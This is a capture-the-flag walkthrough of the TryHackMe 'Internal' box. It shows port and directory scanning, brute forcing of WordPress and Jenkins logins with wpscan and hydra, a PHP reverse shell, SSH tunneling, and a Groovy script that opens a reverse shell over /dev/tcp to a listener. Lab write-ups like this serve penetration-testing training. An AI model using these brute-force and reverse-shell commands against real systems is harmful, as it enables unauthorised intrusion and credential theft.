THM - Internal
Internal is another fun box in the Offensive Pentesting series on TryHackMe.
This box is not a difficult one. However, it does have a few rabbit holes, and it is just a long box to complete. I strongly suggest looking at this guide to get you unstuck if you hit a wall.
Starting Off
First off, we start by reading the Pre-engagement Briefing and then adding internal.thm to /etc/hosts.
We now know that we are looking at a web app, so let's run an Nmap scan on our target.
Port Scanning
sudo nmap -v -sV -sS -p- -T4 -sC -oN portScan <ip>
Our TCP port scan only finds ports 22 and 80 open.
Enumerating the web page - Apache httpd 2.4.29
If we visit the webpage, we get the Apache2 Ubuntu Default Page.
Our next step is to try to find directories we can navigate to; for this I ran gobuster.
gobuster dir -u internal.thm -w /usr/share/wordlists/dirb/common.txt
We are in luck: we found some interesting directories, /phpmyadmin/, /wordpress/ and /blog/.
After going through some rabbit holes, I did more research on WordPress and found a useful tool called wpscan. I ran the following:
wpscan --url http://internal.thm/wordpress/
This showed me a readme located at /wordpress/readme.html
Clicking on the login page link, we get a login page.
Trying admin:admin produces a response that indicates the username admin is valid. I confirmed this as well using:
wpscan --url http://internal.thm/blog -e
Now we just need a password; wpscan also has the capability to brute force logins.
wpscan --url http://internal.thm/blog/wp-login.php --usernames 'admin' -P /usr/share/wordlists/rockyou.txt
After running the above you will get the credentials you need to log in.
Obtaining a reverse shell
Like most CTFs at this point, you want to look for a place where you can either upload a file or edit some code.
We can add a PHP reverse shell there. You can find the code for a PHP reverse shell here: https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php.
Copy, paste and edit the IP and port appropriately. Make sure to set up your netcat listener in your terminal:
nc -lvnp <port>
After you have saved your changes and made sure your netcat listener is ready, navigate to the web page you edited and you will obtain a shell.
Awesome we are in.
The first thing I do when I obtain a shell is navigate through the machine to see what might have been left behind.
Navigating to the home directory, we find a user called Aubreanna. We cannot enter Aubreanna's home directory.
In the /opt directory there is a file called wp-save.txt; cat this file and it reveals the password for Aubreanna.
Because SSH is available, you can SSH to the machine with Aubreanna's credentials to get a more stable shell.
After getting in with her credentials, we can read user.txt and get the flag.
SSH Tunneling
Now for the fun part! This CTF leaves a LOT of clues around on which direction you should take (at least I thought so). Look for the low-hanging fruit first to see what we can and can't do with Aubreanna's credentials.
sudo -l: we can't run anything with sudo, so it looks like we should search for files or upload a Linux enumeration script.
Looking at the home directory, there is a file called jenkins.txt.
This seemed very promising, as Jenkins did not turn up in our port scan.
This was very similar to an earlier CTF I did on THM. So what we can do is something called SSH tunneling. We can perform this by running:
ssh -L 4444:localhost:8080 aubreanna@10.10.31.24
Local port 4444 on our machine is now forwarded through the SSH session to port 8080 on the target's loopback interface, which is why Jenkins never showed up in the external port scan. In your browser, navigate to localhost:4444 and we now have a Jenkins login page.
Now we are back at a login page where we have no credentials to enter. I tried googling for default credentials and using the credentials we previously obtained, but no luck.
It was pretty safe to guess that admin would be a valid username, so let's try brute forcing another login for admin. Hydra can be a difficult tool to understand how to use. I suggest using Burp to capture the login request so you have the form details, word for word, to input into hydra.
hydra 127.0.0.1 -s 4444 -V -f http-form-post "/j_acegi_security_check:j_username=^USER^&j_password=^PASS^&from=%2F&Submit=Sign+in&Login=Login:Invalid username or password" -l admin -P /usr/share/wordlists/rockyou.txt
Now we are in.
Now it seems like we need to get another shell.
Navigating through Jenkins, we find a place where we can run a Groovy script. Doing a bit of research, it's basically Java.
// Groovy: start bash with its stdin/stdout tied to a TCP socket (edit the IP and port to match your listener)
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/4242;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()
So we get another reverse shell using this method, and we are logged in as the jenkins user.
Like the previous time I got a shell, I decided to look around in the directories. Looking in the /opt/ directory, we find another txt file with the root credentials.
You will not be able to su to root from the current shell if you followed this guide. However, you can just SSH into the machine with the root credentials and then cat root.txt.